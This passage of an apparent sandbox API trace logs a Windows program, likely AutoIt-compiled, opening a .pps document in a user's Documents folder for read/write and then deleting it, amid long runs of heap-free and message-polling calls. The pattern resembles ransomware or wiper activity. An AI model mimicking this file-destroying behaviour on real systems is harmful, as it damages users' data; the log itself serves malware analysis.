lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.446] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.447] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.447] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0034.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.447] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.448] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0034.448] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\cjzms2vlntpb5-vcp3um.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0034.448] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0034.448] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.449] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.449] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.449] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.449] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.449] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.449] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.450] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.450] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.450] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.450] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.450] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.451] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.451] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps", lpFilePart=0x0) returned 0x78 [0034.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c50e0 [0034.451] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\cjzms2vlntpb5-vcp3um.pps")) returned 0x20 [0034.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0034.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0034.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0034.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0034.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c95d0 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0034.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c51e8 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c96d8 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c51e8 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0034.452] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180d77d0, ftCreationTime.dwHighDateTime=0x1d5bd8a, ftLastAccessTime.dwLowDateTime=0x764685a0, ftLastAccessTime.dwHighDateTime=0x1d5b8f1, ftLastWriteTime.dwLowDateTime=0x146a1aa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8e5a, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="cJZMs2vLnTpB5-vCp3UM.pps", cAlternateFileName="CJZMS2~1.PPS")) returned 0x7c2100 [0034.452] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\cjzms2vlntpb5-vcp3um.pps")) returned 1 [0034.454] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180d77d0, ftCreationTime.dwHighDateTime=0x1d5bd8a, ftLastAccessTime.dwLowDateTime=0x764685a0, ftLastAccessTime.dwHighDateTime=0x1d5b8f1, ftLastWriteTime.dwLowDateTime=0x146a1aa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8e5a, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="cJZMs2vLnTpB5-vCp3UM.pps", cAlternateFileName="CJZMS2~1.PPS")) returned 0 [0034.454] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c96d8 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0034.454] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.454] HeapFree (in: 